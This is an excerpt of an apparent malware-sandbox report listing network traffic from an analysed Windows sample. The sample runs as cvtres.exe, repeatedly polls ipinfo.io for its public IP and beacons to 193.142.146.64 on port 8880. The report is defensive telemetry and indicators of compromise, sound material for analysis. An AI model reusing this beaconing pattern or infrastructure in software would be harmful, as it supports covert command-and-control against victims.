                                  Oct 5, 2024 16:48:04.336500883 CEST805048434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:04.336620092 CEST5048480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:04.336972952 CEST805048634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:04.337116957 CEST5048680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:04.337232113 CEST5048680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:04.342060089 CEST805048634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:04.810293913 CEST805048634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:04.820040941 CEST504858880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:04.820097923 CEST5048680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:04.824837923 CEST888050485193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:04.824903965 CEST504858880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:04.825092077 CEST805048634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:04.825850964 CEST5048680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:04.829714060 CEST888050485193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:05.951164961 CEST888050485193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:05.951297045 CEST504858880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:05.951520920 CEST504858880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:05.956877947 CEST888050485193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:06.966250896 CEST504878880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:06.971699953 CEST888050487193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:06.971782923 CEST504878880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:06.973164082 CEST5048880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:06.978164911 CEST805048834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:06.978239059 CEST5048880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:06.978383064 CEST5048880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:06.983361006 CEST805048834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:07.471251011 CEST805048834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:07.471533060 CEST504878880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:07.476484060 CEST888050487193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:07.476702929 CEST504878880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:07.481517076 CEST888050487193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:07.512722015 CEST5048880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:08.607254982 CEST888050487193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:08.607358932 CEST504878880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:08.607613087 CEST504878880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:08.612312078 CEST888050487193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:09.575464964 CEST504898880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:09.580424070 CEST888050489193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:09.584204912 CEST504898880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:09.584956884 CEST5048880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:09.585798979 CEST5049080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:09.591478109 CEST805048834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:09.591559887 CEST5048880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:09.592286110 CEST805049034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:09.596371889 CEST5049080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:09.596534014 CEST5049080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:09.602883101 CEST805049034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:10.092355967 CEST805049034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:10.096468925 CEST504898880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:10.103033066 CEST888050489193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:10.104001999 CEST504898880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:10.110362053 CEST888050489193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:10.137721062 CEST5049080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:11.201359034 CEST888050489193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:11.205960989 CEST504898880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:11.212070942 CEST504898880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:11.216974020 CEST888050489193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:12.153506994 CEST504918880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:12.158664942 CEST888050491193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:12.161183119 CEST504918880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:12.161833048 CEST5049080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:12.162552118 CEST5049280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:12.166956902 CEST805049034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:12.167440891 CEST805049234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:12.167517900 CEST5049080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:12.167543888 CEST5049280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:12.167608976 CEST5049280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:12.172936916 CEST805049234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:12.669271946 CEST805049234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:12.672780991 CEST504918880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:12.677779913 CEST888050491193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:12.680845976 CEST504918880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:12.685722113 CEST888050491193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:12.748125076 CEST5049280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:13.815773964 CEST888050491193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:13.815850973 CEST504918880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:13.816155910 CEST504918880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:13.820921898 CEST888050491193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:14.731611967 CEST504938880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:14.736772060 CEST888050493193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:14.736844063 CEST504938880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:14.737638950 CEST5049280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:14.738667965 CEST5049480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:14.742722988 CEST805049234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:14.742772102 CEST5049280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:14.743590117 CEST805049434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:14.743665934 CEST5049480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:14.744007111 CEST5049480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:14.748874903 CEST805049434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:15.223841906 CEST805049434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:15.224085093 CEST504938880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:15.229048967 CEST888050493193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:15.229115009 CEST504938880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:15.234035969 CEST888050493193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:15.325186968 CEST5049480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:16.357650042 CEST888050493193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:16.357850075 CEST504938880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:16.357886076 CEST504938880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:16.362771034 CEST888050493193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:17.247229099 CEST504958880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:17.252342939 CEST888050495193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:17.252445936 CEST504958880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:17.254163027 CEST5049680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:17.259016037 CEST805049634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:17.259126902 CEST5049680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:17.259351015 CEST5049680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:17.264158010 CEST805049634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:17.731580973 CEST805049634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:17.731828928 CEST504958880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:17.736735106 CEST888050495193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:17.736987114 CEST504958880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:17.744028091 CEST888050495193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:17.825197935 CEST5049680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:18.873625994 CEST888050495193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:18.873707056 CEST504958880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:18.873967886 CEST504958880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:18.878758907 CEST888050495193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:19.733887911 CEST504978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:19.738990068 CEST888050497193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:19.741194010 CEST504978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:19.741959095 CEST5049680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:19.742955923 CEST5049880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:19.747317076 CEST805049634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:19.747519970 CEST5049680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:19.748294115 CEST805049834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:19.748383999 CEST5049880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:19.748536110 CEST5049880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:19.754539013 CEST805049834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:19.767982960 CEST5049880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:19.815855980 CEST805049834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:20.114017963 CEST805049834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:20.116292953 CEST5049880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:21.382395029 CEST888050497193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:21.382474899 CEST504978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:21.382689953 CEST504978880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:21.387527943 CEST888050497193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:22.387851954 CEST504998880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:22.392940044 CEST888050499193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:22.393033028 CEST504998880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:22.393692970 CEST5050080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:22.398571014 CEST805050034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:22.398686886 CEST5050080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:22.398751974 CEST5050080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:22.403779984 CEST805050034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:22.872123003 CEST805050034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:22.872348070 CEST504998880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:22.877177954 CEST888050499193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:22.877228975 CEST504998880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:22.882041931 CEST888050499193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:22.918948889 CEST5050080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:24.031627893 CEST888050499193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:24.031701088 CEST504998880192.168.2.7193.142.146.64

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 5, 2024 16:46:39.524691105 CEST5463853192.168.2.71.1.1.1
                                  Oct 5, 2024 16:46:39.532150030 CEST53546381.1.1.1192.168.2.7
                                  Oct 5, 2024 16:46:51.363500118 CEST5362840162.159.36.2192.168.2.7
                                  Oct 5, 2024 16:46:51.907586098 CEST5356253192.168.2.71.1.1.1
                                  Oct 5, 2024 16:46:51.915015936 CEST53535621.1.1.1192.168.2.7
                                  Oct 5, 2024 16:46:55.869183064 CEST5250553192.168.2.71.1.1.1
                                  Oct 5, 2024 16:46:55.877756119 CEST53525051.1.1.1192.168.2.7
                                  Oct 5, 2024 16:47:20.918680906 CEST5525453192.168.2.71.1.1.1
                                  Oct 5, 2024 16:47:20.925561905 CEST53552541.1.1.1192.168.2.7
                                  Oct 5, 2024 16:47:35.146512985 CEST5916753192.168.2.71.1.1.1
                                  Oct 5, 2024 16:47:35.153973103 CEST53591671.1.1.1192.168.2.7

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Oct 5, 2024 16:46:39.524691105 CEST192.168.2.71.1.1.10x50e8Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                  Oct 5, 2024 16:46:51.907586098 CEST192.168.2.71.1.1.10x2ad7Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                  Oct 5, 2024 16:46:55.869183064 CEST192.168.2.71.1.1.10xc3a2Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                  Oct 5, 2024 16:47:20.918680906 CEST192.168.2.71.1.1.10x7838Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                  Oct 5, 2024 16:47:35.146512985 CEST192.168.2.71.1.1.10xbb83Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Oct 5, 2024 16:46:39.532150030 CEST1.1.1.1192.168.2.70x50e8No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                  Oct 5, 2024 16:46:51.915015936 CEST1.1.1.1192.168.2.70x2ad7Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                  Oct 5, 2024 16:46:55.877756119 CEST1.1.1.1192.168.2.70xc3a2No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                  Oct 5, 2024 16:47:20.925561905 CEST1.1.1.1192.168.2.70x7838No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                  Oct 5, 2024 16:47:35.153973103 CEST1.1.1.1192.168.2.70xbb83No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • ipinfo.io

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.74980434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:39.548820972 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:40.215892076 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:39 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:46:40.239494085 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:39 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.74981634.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:41.964350939 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:42.475538969 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:41 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.74983334.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:44.681809902 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:46:45.156877995 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:44 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.74985034.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:47.321887016 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:47.797816992 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:47 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.74986534.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:50.075680971 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:50.579448938 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:50 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.75032934.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:52.770040989 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:53.566658974 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:52 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:46:53.567800999 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:52 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.75034834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:55.901055098 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:56.379522085 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:55 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.75036434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:46:58.103980064 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:58.681879044 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:58 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.75038134.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:00.992677927 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:01.493001938 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:01 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.75039834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:03.688852072 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:04.163184881 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:03 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.75041534.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:06.322479010 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:06.805242062 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:06 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.75043234.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:08.962059021 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:09.473046064 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:09 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.75044534.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:12.636420965 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:13.113657951 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:12 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.75045034.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:15.276431084 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:15.765188932 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:15 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.75045234.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:17.946633101 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:18.431031942 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:18 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.75045434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:20.931583881 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:21.425858974 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:21 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.75045634.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:23.679546118 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:24.136053085 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:23 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
